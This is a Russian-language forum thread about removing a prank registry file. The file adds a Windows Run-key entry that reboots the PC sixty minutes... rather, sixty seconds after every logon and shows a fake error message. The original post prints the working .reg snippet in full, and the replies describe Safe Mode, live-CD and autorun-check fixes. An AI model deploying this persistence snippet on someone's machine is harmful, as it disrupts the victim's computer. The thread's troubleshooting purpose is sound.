Ох не рой другому яму..., Лечить или не лечить? Опции

[Г`рызь]

Привет форумчане!
Есть вопрос.
"Обрадовало" тут одно не очень юное дарование, кул-хацкер местного разлива.
Решило "отмстить коварно недругу отвратному" )))
Нарыл в сети вот таку пакость:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"WindowsService"="C:\\WINDOWS\\system32\\shutdown.exe -r -t 60 -c \"Ошибка! Пользователь не найден! Система будет перезагружена!\""

Склепал *.reg , благо дело не хитрое, и в восторге от собственной крутости жамкнул по файлику)))
Уж не знаю как он там соглашался с запросом системы на изменение реестра, но факт - СРАБОТАЛО)))
Пакость оказалась, вполне себе, рабочая и даже живучая...
Ток вот как теперь избавиться от сей радости он, собственно, даже не задумывался. )))
Бекапа нет, восстановление отключено (оно ж кул-хацкер, на кой ему всяким бяком место занимать)
Система ХР sp3, какой то жуткий кастрированный Зверь... и диска с дистрибутивом нету...
Новую систему не хочет... обязательно нужно реанимировать эту...
Послать то я его послал... (так что пойдет к вам однако )
Но для себя, как то, хотелось бы понять алгоритм действий при лечении такой вот пакости...
В живую сталкиваюсь впервые.
Лучше работать с лайф сд или как то с консоли можно расковырять?

[Kir]

С лайф CD утилитой зайти в реестр и из папки автозагрузки (run) убрать ключ на выключение компа. Тоже мне вирус блин

[moderator]

проще загрузится в Safe Mode (безопасном режиме) и переименовать shotdown.exe в любую фигню (лежит C:\Windows\ System32 ). И всё.

Либо, если умеет пользоваться regedit, то удалить соответствующую строчку из реестра.

По умолчанию, разделы "Run" игнорируются при загрузке компьютера в безопасном
http://support.microsoft.com/kb/314866

[DeeM Vest]

проще загрузится в Safe Mode (безопасном режиме) и переименовать shotdown.exe в любую фигню (лежит C:\Windows\ System32 ). И всё.

Либо, если умеет пользоваться regedit, то удалить соответствующую строчку из реестра.

По умолчанию, разделы "Run" игнорируются при загрузке компьютера в безопасном
http://support.microsoft.com/kb/314866

Или ERD Commander - загрузка со сменного носителя и редактирование реестра машины и многое другое

[Г`рызь]

С лайф CD утилитой зайти в реестр и из папки автозагрузки (run) убрать ключ на выключение компа. Тоже мне вирус блин

Да реест лайфом поправить не проблемма) загрузить да выгрузить куст) делов то)
НО... это зная что произошло... а такого счастья как то не особо попадает)))
Обычно приходят и - "Оно сломалось! Сделай мне хорошо..."
Как диагностировать такую хреновинку(да и подобные) ...
Просто думал какие то способы есть... мало ли кто чего присоветует.. опыта то у народа море разливанное.

[moderator]

Да реест лайфом поправить не проблемма) загрузить да выгрузить куст) делов то)
НО... это зная что произошло... а такого счастья как то не особо попадает)))
Обычно приходят и - "Оно сломалось! Сделай мне хорошо..."
Как диагностировать такую хреновинку(да и подобные) ...
Просто думал какие то способы есть... мало ли кто чего присоветует.. опыта то у народа море разливанное.

Я первым делом всегда смотрю автозапуск (в реестре, в папке "автозапуск"), так что подобное не пропустил бы.

[n1ce]

можно простой прогой ccleaner через реест убрать мега вирус)

[DeeM Vest]

можно простой прогой ccleaner через реест убрать мега вирус)

Мудро! Но вот хорошо бы сначала загрузиться. А скриптик загрузиться не дает.
Из безопасного режима можно, но раз известно место установки, значит и оттуда же удалить можно и руками. Главное загрузиться